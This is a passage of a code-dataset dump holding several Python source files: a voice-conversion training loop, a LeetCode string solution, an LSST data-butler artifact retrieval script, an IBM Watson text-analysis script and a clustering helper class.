self.use_tensorboard:\n self.build_tensorboard()\n\n def build_model(self):\n # self.G = Generator(self.hparams)\n\n self.G1 = Generator_MI(self.hparams, self.use_VQCPC, self.use_VQCPC_2)\n\n self.Interp = InterpLnr(self.hparams)\n\n self.g_optimizer = torch.optim.Adam(self.G1.parameters(), self.g_lr, [self.beta1, self.beta2])\n self.print_network(self.G1, 'G')\n\n self.G1.to(self.device)\n self.G1 = torch.nn.DataParallel(self.G1, device_ids=self.device_ids, output_device=self.device_ids[0]) # 主要就是这句\n self.Interp.to(self.device)\n\n def build_model2(self):\n self.G2 = Generator_Decoder(self.hparams, self.use_pitch)\n self.g2_optimizer = torch.optim.Adam(self.G2.parameters(), self.g_lr, [self.beta1, self.beta2])\n self.G2.to(self.device)\n self.G2 = torch.nn.DataParallel(self.G2, device_ids=self.device_ids, output_device=self.device_ids[0]) # 主要就是这句\n\n def print_network(self, model, name):\n \"\"\"Print out the network information.\"\"\"\n num_params = 0\n for p in model.parameters():\n num_params += p.numel()\n # print(model)\n # print(name)\n # print(\"The number of parameters: {}\".format(num_params))\n\n def print_optimizer(self, opt, name):\n print(opt)\n print(name)\n\n def restore_model(self, resume_iters):\n print('Loading the 
trained models from step {}...'.format(resume_iters))\n G_path = os.path.join(self.model_save_dir, '{}-G.ckpt'.format(resume_iters))\n g_checkpoint = torch.load(G_path, map_location=lambda storage, loc: storage)\n self.G1.load_state_dict(g_checkpoint['model'])\n self.g_optimizer.load_state_dict(g_checkpoint['optimizer'])\n self.g_lr = self.g_optimizer.param_groups[0]['lr']\n\n def build_tensorboard(self):\n \"\"\"Build a tensorboard logger.\"\"\"\n from torch.utils.tensorboard import SummaryWriter\n self.writer = SummaryWriter(self.log_dir)\n\n def reset_grad(self):\n \"\"\"Reset the gradient buffers.\"\"\"\n self.g_optimizer.zero_grad()\n self.g2_optimizer.zero_grad()\n # self.optimizer_cpc.zero_grad()\n # self.optimizer_cpc_2.zero_grad()\n\n def mi_first_forward(self, content, pitch, rhythm, optimizer_cp_mi_net, optimizer_rc_mi_net, optimizer_rp_mi_net):\n optimizer_cp_mi_net.zero_grad()\n optimizer_rc_mi_net.zero_grad()\n optimizer_rp_mi_net.zero_grad()\n content = content.detach()\n pitch = pitch.detach()\n rhythm = rhythm.detach()\n lld_cp_loss = -self.cp_mi_net.loglikeli(content, pitch)\n lld_rc_loss = -self.rc_mi_net.loglikeli(rhythm, content)\n lld_rp_loss = -self.rp_mi_net.loglikeli(rhythm, pitch)\n lld_cp_loss.backward()\n lld_rc_loss.backward()\n lld_rp_loss.backward()\n optimizer_cp_mi_net.step()\n optimizer_rc_mi_net.step()\n optimizer_rp_mi_net.step()\n return optimizer_cp_mi_net, optimizer_rc_mi_net, optimizer_rp_mi_net, lld_cp_loss, lld_rc_loss, lld_rp_loss\n\n def mi_second_forward(self, content, pitch, rhythm, x_real_org):\n if self.use_pitch:\n x_identic, mel_outputs_postnet, spk_pred, content_pred, pitch_predict = self.G2(content, pitch, rhythm, x_real_org)\n return x_identic, mel_outputs_postnet, spk_pred, content_pred, pitch_predict\n else:\n x_identic, mel_outputs_postnet, spk_pred, content_pred = self.G2(content, pitch, rhythm, x_real_org)\n return x_identic, mel_outputs_postnet, spk_pred, content_pred\n\n # =====================================================================================================================\n\n def train(self):\n # Set data loader.\n data_loader = self.vcc_loader\n\n # Fetch fixed inputs for debugging.\n data_iter = iter(data_loader)\n\n self.cp_mi_net.to(self.device)\n self.rc_mi_net.to(self.device)\n self.rp_mi_net.to(self.device)\n\n optimizer_cp_mi_net = self.optimizer_cp_mi_net\n optimizer_rc_mi_net = self.optimizer_rc_mi_net\n optimizer_rp_mi_net = self.optimizer_rp_mi_net\n\n # if self.use_VQCPC:\n # self.cpc.to(self.device)\n # elif self.use_VQCPC_2:\n # self.cpc_2.to(self.device)\n\n\n # Start training from scratch or resume training.\n start_iters = 0\n if self.resume_iters:\n print('Resuming ...')\n start_iters = self.resume_iters\n self.num_iters += self.resume_iters\n self.restore_model(self.resume_iters)\n self.print_optimizer(self.g_optimizer, 'G_optimizer')\n\n # Learning rate cache for decaying.\n g_lr = self.g_lr\n print('Current learning rates, g_lr: {}.'.format(g_lr))\n\n # Print logs in specified order\n\n keys = ['G/loss_id', 'G/loss_id_psnt', 'spk_loss', 'content_adv_loss', 'mi_cp_loss', 'mi_rc_loss',\n 'mi_rp_loss', 'lld_cp_loss', 'lld_rc_loss', 'lld_rp_loss']\n\n if self.use_VQCPC or self.use_VQCPC_2:\n keys.append('vq_loss')\n keys.append('cpc_loss')\n\n if self.use_pitch:\n keys.append('pitch_loss')\n\n # Start training.\n print('Start training...')\n start_time = time.time()\n for i in range(start_iters, self.num_iters):\n\n # 
=================================================================================== #\n # 1. Preprocess input data #\n # =================================================================================== #\n\n # Fetch real images and labels.\n try:\n x_real_org, emb_org, f0_org, len_org = next(data_iter)\n except:\n data_iter = iter(data_loader)\n x_real_org, emb_org, f0_org, len_org = next(data_iter)\n\n x_real_org = x_real_org.to(self.device)\n emb_org = emb_org.to(self.device)\n len_org = len_org.to(self.device)\n f0_org = f0_org.to(self.device)\n\n # =================================================================================== #\n # 2. Train the generator #\n # =================================================================================== #\n\n self.G1 = self.G1.train()\n self.G2 = self.G2.train()\n\n '''\n input: \n x_real_org: (batch, max_len_pad, mel_dim(80))\n f0_org.shape: (batch, max_len_pad, 1)\n '''\n\n # Identity mapping loss\n x_f0 = torch.cat((x_real_org, f0_org), dim=-1) # to (batch, max_len_pad, mel_dim + f0_dim(81))\n x_f0_intrp = self.Interp(x_f0,\n len_org) # len_org: min_len_seq ~ max_len_seq 之间的随机数, (batch) to (batch, max_len_pad, 81)\n f0_org_intrp = quantize_f0_torch(x_f0_intrp[:, :, -1])[0] # to (batch, max_len_pad, 257)\n x_f0_intrp_org = torch.cat((x_f0_intrp[:, :, :-1], f0_org_intrp), dim=-1) # to (batch, max_len_pad, 257+80)\n\n '''\n x_f0_intrp_org: (batch, max_len_pad, 337)\n x_real_org: (batch, max_len_pad, 80)\n emb_org: (batch, 100)\n '''\n\n if self.use_VQCPC or self.use_VQCPC_2:\n content, pitch, rhythm, quantized_, x_f0_beforeVQ, c, x_f0_VQ = self.G1(x_f0_intrp_org, x_real_org)\n else:\n content, pitch, rhythm = self.G1(x_f0_intrp_org, x_real_org)\n\n if self.use_mi:\n for j in range(5): # mi_iters\n optimizer_cp_mi_net, optimizer_rc_mi_net, optimizer_rp_mi_net, lld_cp_loss, lld_rc_loss, lld_rp_loss = \\\n self.mi_first_forward(content, pitch, rhythm, optimizer_cp_mi_net, optimizer_rc_mi_net,\n optimizer_rp_mi_net)\n else:\n lld_cp_loss = torch.tensor(0.).to(self.device)\n lld_rc_loss = torch.tensor(0.).to(self.device)\n lld_rp_loss = torch.tensor(0.).to(self.device)\n\n if self.use_pitch:\n x_identic, mel_outputs_postnet, spk_pred, content_pred, pitch_predict = self.mi_second_forward(content, pitch, rhythm,\n x_real_org)\n else:\n x_identic, mel_outputs_postnet, spk_pred, content_pred = self.mi_second_forward(content, pitch, rhythm,\n x_real_org)\n\n # x_identic, mel_outputs_postnet, spk_pred, content_pred = self.G(x_f0_intrp_org, x_real_org, emb_org) # to (batch, max_len_pad, 80)\n g_loss_id = F.mse_loss(x_real_org.to(self.device), x_identic.to(self.device), reduction='mean')\n g_loss_id_psnt = F.mse_loss(x_real_org.to(self.device), mel_outputs_postnet.to(self.device))\n\n # Backward and optimize.\n if self.use_l1_loss:\n g_loss = g_loss_id + g_loss_id_psnt + \\\n F.l1_loss(x_real_org.to(self.device), x_identic.to(self.device)) + \\\n F.l1_loss(x_real_org.to(self.device), mel_outputs_postnet.to(self.device))\n\n else:\n g_loss = g_loss_id + g_loss_id_psnt\n\n x_real_org.requirre_grad = False\n emb_org.requirre_grad = False\n\n if self.use_adv:\n spk_loss = self.advloss(spk_pred.to(self.device), emb_org)\n content_adv_loss = self.advloss(content_pred, emb_org)\n g_loss += self.lambda_cd * spk_loss + self.lambda_cd * content_adv_loss\n else:\n content_adv_loss = torch.tensor(0.).to(self.device)\n spk_loss = torch.tensor(0.).to(self.device)\n\n if self.use_mi:\n mi_cp_loss = 0.01 * self.cp_mi_net.mi_est(content, pitch) # mi_weight\n 
mi_rc_loss = 0.01 * self.rc_mi_net.mi_est(rhythm, content) # mi_weight\n mi_rp_loss = 0.01 * self.rp_mi_net.mi_est(rhythm, pitch) # mi_weight\n g_loss += mi_cp_loss + mi_rc_loss + mi_rp_loss\n else:\n mi_cp_loss = torch.tensor(0.).to(self.device)\n mi_rc_loss = torch.tensor(0.).to(self.device)\n mi_rp_loss = torch.tensor(0.).to(self.device)\n\n # if self.use_VQCPC:\n # e_latent_loss = F.mse_loss(x_f0_beforeVQ, quantized_.detach())\n # vq_loss = 0.25 * e_latent_loss\n #\n # cpc_loss, accuracy = self.cpc(x_f0_VQ, c)\n #\n # g_loss += vq_loss + cpc_loss\n #\n # elif self.use_VQCPC_2:\n # e_latent_loss = F.mse_loss(x_f0_beforeVQ, quantized_.detach())\n # vq_loss = 0.25 * e_latent_loss\n #\n # cpc_loss, accuracy = self.cpc_2(x_f0_VQ, c)\n #\n # g_loss += vq_loss + cpc_loss\n\n if self.use_pitch:\n zeros = torch.zeros_like(f0_org)\n f0_zero = torch.where(f0_org == -1e10, zeros, f0_org)\n pitch_loss = F.mse_loss(f0_zero.to(self.device), pitch_predict.to(self.device), reduction='mean')\n g_loss += 0.1 * pitch_loss\n\n self.reset_grad()\n g_loss.backward()\n self.g_optimizer.step()\n self.g2_optimizer.step()\n # if self.use_VQCPC:\n # self.optimizer_cpc.step()\n #\n # elif self.use_VQCPC_2:\n # self.optimizer_cpc_2.step()\n\n # Logging.\n loss = {}\n loss['G/loss_id'] = g_loss_id.item()\n loss['G/loss_id_psnt'] = g_loss_id_psnt.item()\n loss['spk_loss'] = spk_loss.item()\n loss['content_adv_loss'] = content_adv_loss.item()\n loss['mi_cp_loss'] = mi_cp_loss.item()\n loss['mi_rc_loss'] = mi_rc_loss.item()\n loss['mi_rp_loss'] = mi_rp_loss.item()\n loss['lld_cp_loss'] = lld_cp_loss.item()\n loss['lld_rc_loss'] = lld_rc_loss.item()\n loss['lld_rp_loss'] = lld_rp_loss.item()\n # if self.use_VQCPC or self.use_VQCPC_2:\n # loss['vq_loss'] = vq_loss.item()\n # loss['cpc_loss'] = cpc_loss.item()\n if self.use_pitch:\n loss['pitch_loss'] = pitch_loss.item()\n\n\n\n # =================================================================================== #\n # 4. 
Miscellaneous #\n # =================================================================================== #\n\n # Print out training information.\n if (i + 1) % self.log_step == 0:\n et = time.time() - start_time\n et = str(datetime.timedelta(seconds=et))[:-7]\n log = \"Elapsed [{}], Iteration [{}/{}]\".format(et, i + 1, self.num_iters)\n for tag in keys:\n log += \", {}: {:.8f}\".format(tag, loss[tag])\n print(log)\n # if self.use_VQCPC or self.use_VQCPC_2:\n # print(100 * np.array(accuracy))\n\n if self.use_tensorboard:\n for tag, value in loss.items():\n self.writer.add_scalar(tag, value, i + 1)\n\n # Save model checkpoints.\n if (i + 1) >= 150000 and (i + 1) % self.model_save_step == 0:\n G_path = os.path.join(self.model_save_dir, '{}-G.ckpt'.format(i + 1))\n\n checkpoint_state = {\n 'G1': self.G1.state_dict(),\n 'G2': self.G2.state_dict(),\n 'optimizerG1': self.g_optimizer.state_dict(),\n 'optimizerG2': self.g2_optimizer.state_dict(),\n 'cp_mi_net': self.cp_mi_net.state_dict(),\n 'rc_mi_net': self.rc_mi_net.state_dict(),\n 'rp_mi_net': self.rp_mi_net.state_dict(),\n \"optimizer_cp_mi_net\": optimizer_cp_mi_net.state_dict(),\n \"optimizer_rc_mi_net\": optimizer_rc_mi_net.state_dict(),\n \"optimizer_rp_mi_net\": optimizer_rp_mi_net.state_dict(),\n \"epoch\": i + 1\n }\n\n # if self.use_VQCPC:\n # checkpoint_state[\"cpc\"] = self.cpc.state_dict()\n # checkpoint_state[\"optimizer_cpc\"] = self.optimizer_cpc.state_dict()\n # if self.use_VQCPC_2:\n # checkpoint_state[\"cpc\"] = self.cpc_2.state_dict()\n # checkpoint_state[\"optimizer_cpc\"] = self.optimizer_cpc_2.state_dict()\n\n torch.save(checkpoint_state, G_path)\n print('Saved model checkpoints into {}...'.format(self.model_save_dir))\n\n # Validation.\n if (i + 1) % self.sample_step == 0:\n self.G1 = self.G1.eval()\n self.G2 = self.G2.eval()\n with torch.no_grad():\n loss_val = []\n for val_sub in validation_pt:\n # emb_org_val = torch.from_numpy(val_sub[1]).to(self.device)\n for k in range(2, 3):\n x_real_pad, _ = pad_seq_to_2(val_sub[k][0][np.newaxis, :, :], MAX_LEN)\n # len_org = torch.tensor([val_sub[k][2]]).to(self.device)\n f0_org = np.pad(val_sub[k][1], (0, MAX_LEN - val_sub[k][2]), 'constant',\n constant_values=(0, 0))\n f0_quantized = quantize_f0_numpy(f0_org)[0]\n f0_onehot = f0_quantized[np.newaxis, :, :]\n f0_org_val = torch.from_numpy(f0_onehot).to(self.device)\n x_real_pad = torch.from_numpy(x_real_pad).to(self.device)\n x_f0 = torch.cat((x_real_pad, f0_org_val), dim=-1)\n\n if self.use_VQCPC or self.use_VQCPC_2:\n content, pitch, rhythm, _, _, _, _ = self.G1(x_f0, x_real_pad) # emb_trg\n else:\n content, pitch, rhythm = self.G1(x_f0, x_real_pad) # emb_trg\n if self.use_pitch:\n _, x_identic_val, _, _, _ = self.G2(content, pitch, rhythm, x_real_pad)\n else:\n _, x_identic_val, _, _ = self.G2(content, pitch, rhythm, x_real_pad)\n\n # x_identic_val = self.G(x_f0, x_real_pad, emb_org_val)\n g_loss_val = F.mse_loss(x_real_pad, x_identic_val, reduction='sum')\n loss_val.append(g_loss_val.item())\n val_loss = np.mean(loss_val)\n print('Validation loss: {}'.format(val_loss))\n if self.use_tensorboard:\n self.writer.add_scalar('Validation_loss', val_loss, i + 1)\n\n # plot test samples\n if (i + 1) % self.sample_step == 0:\n self.G1 = self.G1.eval()\n self.G2 = self.G2.eval()\n with torch.no_grad():\n for val_sub in validation_pt:\n # emb_org_val = torch.from_numpy(val_sub[1]).to(self.device)\n for k in range(2, 3):\n x_real_pad, _ = pad_seq_to_2(val_sub[k][0][np.newaxis, :, :], MAX_LEN)\n # len_org = 
torch.tensor([val_sub[k][2]]).to(self.device)\n f0_org = np.pad(val_sub[k][1], (0, MAX_LEN - val_sub[k][2]), 'constant',\n constant_values=(0, 0))\n f0_quantized = quantize_f0_numpy(f0_org)[0]\n f0_onehot = f0_quantized[np.newaxis, :, :]\n f0_org_val = torch.from_numpy(f0_onehot).to(self.device)\n x_real_pad = torch.from_numpy(x_real_pad).to(self.device)\n x_f0 = torch.cat((x_real_pad, f0_org_val), dim=-1)\n x_f0_F = torch.cat((x_real_pad, torch.zeros_like(f0_org_val)), dim=-1)\n x_f0_C = torch.cat((torch.zeros_like(x_real_pad), f0_org_val), dim=-1)\n\n # x_identic_val = self.G(x_f0, x_real_pad, emb_org_val)\n # x_identic_woF = self.G(x_f0_F, x_real_pad, emb_org_val)\n # x_identic_woR = self.G(x_f0, torch.zeros_like(x_real_pad), emb_org_val)\n # x_identic_woC = self.G(x_f0_C, x_real_pad, emb_org_val)\n\n if self.use_VQCPC or self.use_VQCPC_2:\n content, pitch, rhythm, _, _, _, _ = self.G1(x_f0, x_real_pad) # emb_trg\n else:\n content, pitch, rhythm = self.G1(x_f0, x_real_pad) # emb_trg\n if self.use_pitch:\n _, x_identic_val, _, _, _ = self.G2(content, pitch, rhythm, x_real_pad)\n else:\n _, x_identic_val, _, _ = self.G2(content, pitch, rhythm, x_real_pad)\n\n if self.use_VQCPC or self.use_VQCPC_2:\n content, pitch, rhythm, _, _, _, _ = self.G1(x_f0_F, x_real_pad) # emb_trg\n else:\n content, pitch, rhythm = self.G1(x_f0_F, x_real_pad) # emb_trg\n if self.use_pitch:\n _, x_identic_woF, _, _, _ = self.G2(content, pitch, rhythm, x_real_pad)\n else:\n _, x_identic_woF, _, _ = self.G2(content, pitch, rhythm, x_real_pad)\n\n if self.use_VQCPC or self.use_VQCPC_2:\n content, pitch, rhythm, _, _, _, _ = self.G1(x_f0, torch.zeros_like(x_real_pad)) # emb_trg\n else:\n content, pitch, rhythm = self.G1(x_f0, torch.zeros_like(x_real_pad)) # emb_trg\n if self.use_pitch:\n _, x_identic_woR, _, _, _ = self.G2(content, pitch, rhythm, x_real_pad)\n else:\n _, x_identic_woR, _, _ = self.G2(content, pitch, rhythm, x_real_pad)\n\n if self.use_VQCPC or self.use_VQCPC_2:\n content, pitch, rhythm, _, _, _, _ = self.G1(x_f0_C, x_real_pad) # emb_trg\n else:\n content, pitch, rhythm = self.G1(x_f0_C, x_real_pad) # emb_trg\n if self.use_pitch:\n _, x_identic_woC, _, _, _ = self.G2(content, pitch, rhythm, x_real_pad)\n else:\n _, x_identic_woC, _, _ = self.G2(content, pitch, rhythm, x_real_pad)\n\n melsp_gd_pad = x_real_pad[0].cpu().numpy().T\n melsp_out = x_identic_val[0].cpu().numpy().T\n melsp_woF = x_identic_woF[0].cpu().numpy().T\n melsp_woR = x_identic_woR[0].cpu().numpy().T\n melsp_woC = x_identic_woC[0].cpu().numpy().T\n\n min_value = np.min(np.hstack([melsp_gd_pad, melsp_out, melsp_woF, melsp_woR, melsp_woC]))\n max_value = np.max(np.hstack([melsp_gd_pad, melsp_out, melsp_woF, melsp_woR, melsp_woC]))\n\n fig, (ax1, ax2, ax3, ax4, ax5) = plt.subplots(5, 1, sharex=True)\n im1 = ax1.imshow(melsp_gd_pad, aspect='auto', vmin=min_value, vmax=max_value)\n im2 = ax2.imshow(melsp_out, aspect='auto', vmin=min_value, vmax=max_value)\n im3 = ax3.imshow(melsp_woC, aspect='auto', vmin=min_value, vmax=max_value)\n im4 = ax4.imshow(melsp_woR, aspect='auto', vmin=min_value, vmax=max_value)\n im5 = ax5.imshow(melsp_woF, aspect='auto', vmin=min_value, vmax=max_value)\n plt.savefig(f'{self.sample_dir}/{i + 1}_{val_sub[0]}_{k}.png', dpi=150)\n plt.close(fig)\n","repo_name":"YoungSeng/SRD-VC","sub_path":"My_model/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":26091,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"66"} 
+{"seq_id":"70084946451","text":"#https://leetcode.com/explore/challenge/card/30-day-leetcoding-challenge/529/week-2/3291/\n#Given two strings S and T, return if they are equal when both are typed into empty text editors. # means a backspace character.\n\nclass Solution:\n\n def processWord(self, word: str):\n newChars=[]\n for i in range (0,len(word)):\n if word[i]==\"#\":\n if newChars!=[]:\n newChars.pop()\n \n continue\n \n newChars.append(word[i])\n return newChars\n \n \n def backspaceCompare(self, S: str, T: str) -> bool:\n newS=self.processWord(S)\n newT=self.processWord(T) \n \n return newS==newT\n","repo_name":"Iryna-Slynko/Python-Challenges","sub_path":"Backspace-String-Compare.py","file_name":"Backspace-String-Compare.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"874391634","text":"from __future__ import annotations\n\n__all__ = (\"retrieveArtifacts\",)\n\nimport logging\nfrom types import EllipsisType\nfrom typing import TYPE_CHECKING\n\nfrom .._butler import Butler\n\nif TYPE_CHECKING:\n from lsst.resources import ResourcePath\n\nlog = logging.getLogger(__name__)\n\n\ndef retrieveArtifacts(\n repo: str,\n destination: str,\n dataset_type: tuple[str, ...],\n collections: tuple[str, ...],\n where: str,\n find_first: bool,\n transfer: str,\n preserve_path: bool,\n clobber: bool,\n) -> list[ResourcePath]:\n \"\"\"Parameters are those required for querying datasets plus a destination\n URI.\n\n Parameters\n ----------\n repo : `str`\n URI string of the Butler repo to use.\n destination : `str`\n URI string of the directory to write the artifacts.\n dataset_type : `tuple` of `str`\n Dataset type names. An empty tuple implies all dataset types.\n collections : `tuple` of `str`\n Names of collection globs to match. An empty tuple implies all\n collections.\n where : `str`\n Query modification string.\n find_first : `bool`\n Whether only the first match should be used.\n transfer : `str`\n Transfer mode to use when placing artifacts in the destination.\n preserve_path : `bool`\n If `True` the full datastore path will be retained within the\n destination directory, else only the filename will be used.\n clobber : `bool`\n If `True` allow transfers to overwrite files at the destination.\n\n Returns\n -------\n transferred : `list` of `lsst.resources.ResourcePath`\n The destination URIs of every transferred artifact.\n \"\"\"\n query_types = dataset_type or ...\n query_collections: tuple[str, ...] 
| EllipsisType = collections or ...\n\n butler = Butler.from_config(repo, writeable=False)\n\n # Need to store in list so we can count the number to give some feedback\n # to caller.\n refs = list(\n butler.registry.queryDatasets(\n datasetType=query_types, collections=query_collections, where=where, findFirst=find_first\n )\n )\n\n log.info(\"Number of datasets matching query: %d\", len(refs))\n\n transferred = butler.retrieveArtifacts(\n refs, destination=destination, transfer=transfer, preserve_path=preserve_path, overwrite=clobber\n )\n return transferred\n","repo_name":"lsst/daf_butler","sub_path":"python/lsst/daf/butler/script/retrieveArtifacts.py","file_name":"retrieveArtifacts.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"66"} +{"seq_id":"33044569692","text":"from __future__ import print_function\nimport json\nimport pandas as pd\nimport re\nfrom watson_developer_cloud import NaturalLanguageUnderstandingV1\nfrom watson_developer_cloud.natural_language_understanding_v1 import Features, EntitiesOptions, KeywordsOptions\n\n#Instantiate NLU Object with your Credentials\nservice = NaturalLanguageUnderstandingV1(\n version='2018-03-16',\n #url is optional, and defaults to the URL below. Use the correct URL for your region.\n url='https://gateway.watsonplatform.net/natural-language-understanding/api',\n #change here to your apikey\n iam_apikey='apikey')\n\n#read data\ndf = pd.read_csv(\"ads.csv\")\n\n#remove none value from text data\ndf = df[df[\"Ad_Text \"] != 'none']\n\n#make a test copy\ntest_data = df.head(50).copy()\n\n\nfor index, ad_text in df['Ad_Text '].iteritems():\n print(index)\n response = service.analyze(\n text=ad_text,\n features=Features(entities=EntitiesOptions(),\n keywords=KeywordsOptions()),\n language='en'\n ).get_result()\n # text_characters\n text_characters = re.sub('[\"''{},:]', '', json.dumps(response['usage']['text_characters']))\n df.at[index, \"text_characters\"] = int(text_characters)\n #some text are too small to have 2 keywords and 3 entities, so using aviod error here\n try:\n # keyword\n keyword_1 = re.sub('[\"{},:]', '', json.dumps(response['keywords'][0][\"text\"]))\n relevance_1 = re.sub('[\"{},:]', '', json.dumps(response['keywords'][0][\"relevance\"]))\n keyword_1 = keyword_1.replace(\"'\", \" \").replace(\"'\", \" \").replace(\"'\", \"\")\n test_data.at[index, str(keyword_1)] = float(relevance_1)\n keyword_2 = re.sub('[\"{},:]', '', json.dumps(response['keywords'][1][\"text\"]))\n relevance_2 = re.sub('[\"{},:]', '', json.dumps(response['keywords'][1][\"relevance\"]))\n keyword_2 = keyword_2.replace(\"'\", \" \").replace(\"'\", \" \").replace(\"'\", \"\")\n #save keyword and score to dataframe\n test_data.at[index, str(keyword_2)] = float(relevance_2)\n # entities\n entity_1 = re.sub('[\"{},:]', '', json.dumps(response['entities'][0][\"type\"]))\n entity_relevance_1 = re.sub('[\"{},:]', '', json.dumps(response['entities'][0][\"relevance\"]))\n entity_2 = re.sub('[\"{},:]', '', json.dumps(response['entities'][1][\"type\"]))\n entity_relevance_2 = re.sub('[\"{},:]', '', json.dumps(response['entities'][1][\"relevance\"]))\n entity_3 = re.sub('[\"{},:]', '', json.dumps(response['entities'][2][\"type\"]))\n entity_relevance_3 = re.sub('[\"{},:]', '', json.dumps(response['entities'][2][\"relevance\"]))\n #save entity and score to dataframe\n test_data.at[index, str(entity_1)] = float(entity_relevance_1)\n test_data.at[index, str(entity_2)] = 
float(entity_relevance_2)\n test_data.at[index, str(entity_3)] = float(entity_relevance_3)\n except IndexError or ValueError:\n continue\n\n\ntest_data.to_csv('IBM_test_data.csv')\n","repo_name":"luna0212/F2018APRD6342DigitalAdvertising","sub_path":"IBM_natural_language_understanding_v1.py","file_name":"IBM_natural_language_understanding_v1.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39652422813","text":"import os\nimport h5py\nimport numpy as np\nfrom galpy.util import multi as ml\nfrom astropy.io import fits\nfrom sklearn.metrics import homogeneity_score\nfrom tagspace import tagdir\nfrom tagspace.data import gettimestr\nfrom tagspace.wrappers.genfns import normalgeneration\nfrom tagspace.data.spectra import spectra\nfrom tagspace.clusters import external_validation\nfrom tagspace.clusters.makeclusters import makeclusters\n\nclass tag(makeclusters):\n\t\"\"\"\n\tUsing existing data, find clusters using a user-specified cluster finding algorithm\n\tstructured after the template of scikit-learn (e.g. a class with a fit_predict \n\tfunction)\n\n\t\"\"\"\n\tdef __init__(self,genfn=normalgeneration,instances=1,readdata=False,\n\t\t\t\t filename=None,numcluster=20,numelem=10,maxcores=1,\n\t\t\t\t elems=np.array([6,7,8,11,12,13,14,16,19,20]),\n\t\t\t\t **kwargs):\n\t\t\"\"\"\n\t\tCreate or read cluster data.\n\n\t\tgenfn:\t\tFunction used to find cluster center abundances \n\t\t\t\t\t(defaults to choosing from a normal distribution)\n\t\tinstances:\tThe number of clusters to create with the same \n\t\t\t\t\tparameters (defaults to one)\n\t\treaddata:\tBoolean that looks for existing data if set True \n\t\t\t\t\t(redundant with filename******)\n\t\tfilename:\tIf readdata, read cluster center information from this \n\t\t\t\t\tpath. 
Unless the path starts are root '/' or home '~', \n\t\t\t\t\tassumes data lives in the TAGSPACE_DATA environment \n\t\t\t\t\tvariable\n\t\tnumcluster:\tnumber of clusters to generate (defaults to 20)\n\t\tmaxcores:\tMaxmimum number of cores to use for parallel processes\n\t\telems:\t\tList or array of atomic numbers or symbols for elements\n\t\t\t\t\tto be generated (defaults to: carbon, nitrogen, oxygen,\n\t\t\t\t\tsodum, magnesium, aluminum, silicon, sulfur, potassium,\n\t\t\t\t\tand calcium)\n\t\t**kwargs:\tPassed to genfn\n\n\t\tReturns None\n\t\t\"\"\"\n\t\tsuper(tag,self).__init__(self,genfn=normalgeneration,instances=instances,readdata=readdata,\n\t\t\t\t \t\t\t \t filename=filename,numcluster=numcluster,numelem=numelem,maxcores=maxcores,\n\t\t\t\t \t\t\t \t elems=elems,**kwargs)\n\t\treturn None\n\n\tdef cluster_wrapper(self,i):\n\t\t\"\"\"\n\t\tWrapper to find clusters in parallel.\n\n\t\ti:\t\tIndex to the cluster created instance to use.\n\t\t\"\"\"\n\t\tnumstars = self.clusterdata[i].shape[0]\n\t\tnumproperties = self.clusterdata[i].shape[1]\n\t\trepeatpreds = np.zeros((numstars*self.repeats))\n\t\tstartrack = 0\n\t\tfor r in range(self.repeats):\n\t\t\tpredict = self.clusterfn(**self.kwargs).fit_predict(self.clusterdata[i])\n\t\t\trepeatpreds[startrack:startrack+numstars] = predict\n\t\t\tstartrack+=numstars\n\t\tself.instance['labels_pred_{0}'.format(self.timestamps[i])] = repeatpreds\n\t\tpreds = self.instance['labels_pred_{0}'.format(self.timestamps[i])]\n\t\tpreds.attrs['data'] = self.datapath[i]\n\t\tgetwrapperattrs(preds,self.clusterfn,kwargdict=kwargs)\n\t\treturn repeatpreds\n\n\tdef cluster(self,datapath,clusterfn,repeats=1,**kwargs):\n\t\t\"\"\"\n\t\tIdentify clusters in data file\n\n\t\tdatapath:\t\tPath to cluster data in hdf5 path\n\t\tclusterfn:\t\tFunction used to identify cluster (in the style of scikit learn)\n\t\trepeats:\t\tNumber of times to apply cluster finding to a given data set.\n\t\t**kwargs:\t\tPass to clusterfn\n\n\t\tReturns None\n\n\t\t\"\"\"\n\t\t# Open relevant datafile\n\t\tself.clsfilename = tagdir+'cluster_find/'+self.clusterfn.__name__+'/clusterfinding.hdf5'\n\t\tself.clsdatafile = h5py.File(self.clsfilename,'w')\n\t\tself.clusterpath = clusterfn.__name__\n\n\t\t# Create group if it doesn't already exist\n\t\tif self.clusterpath not in self.datafile:\n\t\t\tself.instance = self.datafile.create_group(self.clusterpath)\n\t\telif self.clusterpath in self.datafile:\n\t\t\tself.instance = self.datafile[self.clusterpath]\n\n\t\t# Find cluster data\n\t\tself.datapath = datapath\n\t\tself.syndatafile = h5py.File(self.synfilename,'w')\n\t\tself.clusterdata = self.syndatafile[datapath][:]\n\t\tself.clusterfn = clusterfn\n\t\tself.repeats = repeats\n\t\tself.kwargs = kwargs\n\t\tself.labels_pred = np.array(ml.parallel_map(self.cluster_wrapper,\n\t\t\t\t\t\t\t\t\t\t\t\t\trange(self.instances),\n\t\t\t\t\t\t\t\t\t\t \t\t\tnumcores=self.maxcores))\n\t\tself.datafile.close()\n\t\treturn None\n\n\tdef extval(self,metric=homogeneity_score):\n\t\tself.extscores = np.zeros((self.instances,self.repeats,self.labels_true.shape[1])) \n\t\tfor i in range(self.instances):\n\t\t\tfor r in range(self.repeats):\n\t\t\t\tself.extscores[i][r] = external_validation(self.labels_true[i],self.labels_pred[i][r],metric=metric)\n\t\treturn None\n\n\tdef intval():\n\t\treturn None\n\n\tdef violinstats():\n\t\treturn 
